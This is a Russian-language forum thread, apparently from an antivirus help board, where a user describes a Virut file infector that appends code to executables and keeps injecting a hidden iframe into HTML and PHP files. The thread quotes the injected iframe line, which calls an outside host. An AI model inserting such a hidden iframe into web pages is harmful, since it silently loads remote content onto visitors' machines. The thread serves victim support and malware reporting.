/jL.chura.pl

Вирус заражает находящиеся на диске C: исполняемые файлы (в основном .exe, но возможно не только), не исключино что и на других дисках поскольку после установки винды вирус появился вновь.. дописывая до каждого из них 18944 байта своего кода, особенно усердствуя в папке C:\Windows\system32\. неизвестные процессы не обнаружены

В результате действия вируса во всех .html и .php файлах на диске C:, а также на других дисках в тех папках, которые открывались в Проводнике или TotalCommander, начинает перед тегом "</body>" в бесконечном цикле добавлятся следующая строчка:

CODE
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

после удаления через секунду код появляется вновь


[IMG]http://forum.drweb.com/style_emoticons/default/sad.gif[/IMG]

после повторной периустановки голой винды в хтмл файлы ничего не дописывается, поетапно будем подключать винду к нету, ставить софт, посмотрим когда активизируется вирус, хочу сравнить исходники инсталях на других дисках, почему то кажется что ехе шники по всех разделах побиты

доктор веб [B] (CureIt) идинтифицирует его как [/B][B]Virus.Win32.Virut.56[/B]

Куреитом до полного излечения лечились?

до конца не лечился, влом 10 часов ждать, поставил винду как ни странно со всех [B]php[/B] файлов на всех дисках удалилились вирусные строки перед боди, подключился в инет все тихо, запустил любой екзешник с любого диска не [B]С,[/B] винт сново всбесился во всех 20000 веб файлах опять таже строка
способ ли чения, удалить все ехе файлы со всех дисков, форматить диск С, чем щас и займусь, вирус неплохой новый, пока в СНГ не много его схватили антивирусы на него не реагируют...

То, что запускали ([i]любой екзешник с любого диска не С[/i]), - пришлите по [url=http://virusinfo.info/pravila.html]правилам[/url].